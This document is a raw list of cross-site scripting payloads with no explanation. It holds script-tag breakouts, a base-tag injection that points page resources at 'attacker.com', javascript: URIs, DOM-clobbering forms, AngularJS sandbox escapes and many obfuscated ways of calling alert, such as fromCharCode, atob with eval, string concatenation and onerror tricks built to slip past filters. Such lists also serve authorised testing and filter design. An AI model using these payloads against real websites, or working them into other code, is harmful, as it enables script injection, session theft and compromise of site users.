"><script>alert(1)</script><base href="//attacker.com/">
<base href="javascript:/a/-alert(1)///////"><a href="../lol/safari.html">click</a>
<form id=x tabindex=0 onfocus=print()><input id=attributes>
<form id="x"><output name="innerHTML"><img src=x onerror=alert(1)></output>
<svg><a><rect width=100% height=100%></rect><animate attributeName=href values=javascript:alert(1)>
x]};alert(1)//
'-alert(1)-'
'-alert(1)//
\'-alert(1)//
</script><img src=x onerror=alert(1)>
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
[].constructor.constructor('alert(1)')()
$eval.constructor('alert(1)')()
String.fromCharCode(97,108,101,114,116,40,49,41)
atob('YWxlcnQoMSk=')
eval(atob('YWxlcnQoMSk='))
setTimeout('ale'+'rt(1)')
setInterval('ale'+'rt(1)')
Function('ale'+'rt(1)')()
new Function`alert(1)```
window['al'+'ert'](1)
window['alert'].call(null,1)
self['alert'](1)
top['alert'](1)
parent['alert'](1)
frames['alert'](1)
globalThis['alert'](1)
Reflect.apply(alert,null,[1])
[].find.call(window,'alert(1)')
window.onerror=alert;throw 1
{onerror=alert}throw 1
onerror=eval;throw'=alert\x281\x29'
